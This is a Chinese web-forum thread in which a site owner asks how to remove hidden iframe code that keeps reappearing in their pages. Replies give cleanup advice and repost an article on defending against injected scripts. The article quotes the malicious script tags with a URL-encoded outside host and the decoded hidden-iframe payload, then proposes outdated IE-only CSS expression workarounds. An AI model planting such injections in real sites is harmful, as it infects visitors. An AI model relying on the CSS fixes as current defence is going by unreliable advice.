我的网站文件下面被添加了<iframe src=http://www. width=0 height=0></iframe>,所以打开时候很慢,我把这个代码删除了，但是不久又来了，怎么办啊?谢谢大家帮我看下了

按日期搜索，，，和原来的备份对比。看是否有多余的。.asp文件
删除掉，，然后清除所有文件中的木马

查询下最近的文件，肯定被放了一个，可能不止一个。asp文件，或者是一个ASPX文件。

这有可能是服务器自身被感染，彻底根除的办法就是解决掉服务器自身的病毒才可以。

是<iframe>...</iframe>和<script>...</script>挂马的一些解决方法：
解决全部网页木马的技巧
还是挂马问题，这段时间，我渐渐感到压力，头大，通过QQ或MSN加我的人越来越多，我最近自己的工作本来就忙得不亦乐乎。哎，想想，还是要抽空来来写出文章给大家参考下。
前不久《一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》得到了很多朋友的认可，这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了，现在流行挂<script>木马，汗了，看了几个网友的网站都被这样了——页面的顶部或底部加上了：  
注意，以下地址含有木马，请不要轻易访问：

<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>

汗死，一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了，直接访问这个http://%76%63%63%64%2E%63%6E（或直接使用迅雷下载），额~　现形了：
document.write("<div style='display:none'>")
document.write("<iframe src=http://a. width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下载http://a.这个文件，一看，乱七八糟的JS编码，汗，不过找到了一个类似QQ号的数字，直接加加看，汗，然后是专业提供网马的组织，哎，什么世道。还收费蛮高滴呢！
...
var Kfqq, Qqs="176878999"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)（下面还有N个统计的JS代码） 网页教学网
针对上面的情况，我也不能白白瞧着不管，想想办法吧，兄弟。喝了碗绿豆粥，糖放得蛮多的，好喝。办法想到了。稍微分析就得出了答案。大家来看看，<script>木马的特点是什么：
<script src=http://%76%63%63%64%2E%63%6E></script>

对了，script木马的src一般都是外域的，也就是src是以http打头的，如果是自己网站的script一般都不用加上http；再看看木马的原形，里面还是输出的iframe、JS代码或是其他<object>代码，不管这么多，来多少杀多少。

来跟我写CSS，一一搞定它们,我写了5种不同的方案，大家来测试一下哈：
解决方案１：

iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理：将<script>标记的src拿出来转为小写，再看是不是以“http”开头的外域JS脚本文件，如果是，则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点：访客无法看到被感染了<script>木马的页面m
解决方案２：

iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

原理：将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完，只有部分被强制缓存输出了，剩下的不会再写了
解决了问题！呵呵!
[bo]转贴：http://www.[/bo]
本文的地址是： http://www.  转载请注明出处！

[[it] 本帖最后由 lele2007 于 2008-5-5 15:59 编辑 [/it]]

有一些是放在数据库里的，你不光要看网页文件，还要看一下数据库。可以用批处理方式净除。